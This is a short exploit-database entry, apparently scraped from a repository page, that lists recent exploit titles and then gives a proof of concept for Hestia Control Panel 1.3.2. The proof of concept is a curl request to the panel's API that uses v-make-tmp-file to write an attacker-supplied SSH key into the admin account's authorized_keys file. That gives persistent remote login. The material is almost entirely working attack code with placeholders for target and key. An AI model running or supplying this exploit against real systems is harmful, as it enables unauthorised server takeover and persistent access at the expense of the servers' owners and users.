1f32ac253c
9 changes to exploits/shellcodes VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) WordPress Plugin Wp-FileManager 6.8 - RCE Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) (PoC) rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated) VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS SEO Panel 4.8.0 - 'order_col' Blind SQL Injection Hestia Control Panel 1.3.2 - Arbitrary File Write rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)
17 lines
No EOL
569 B
Text
17 lines
No EOL
569 B
Text
# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
|
|
# Date: 07.03.2021
|
|
# Author: Numan Türle
|
|
# Vendor Homepage: https://hestiacp.com/
|
|
# Software Link: https://github.com/hestiacp/hestiacp
|
|
# Version: < 1.3.3
|
|
# Tested on: HestiaCP Version 1.3.2
|
|
|
|
curl --location --request POST 'https://TARGET:8083/api/index.php' \
|
|
--form 'hash="HERE_API_KEY"' \
|
|
--form 'returncode="yes"' \
|
|
--form 'cmd="v-make-tmp-file"' \
|
|
--form 'arg1="ssh-rsa HERE_KEY"' \
|
|
--form 'arg2="/home/admin/.ssh/authorized_keys"' \
|
|
--form 'arg3=""' \
|
|
--form 'arg4=""' \
|
|
--form 'arg5=""' |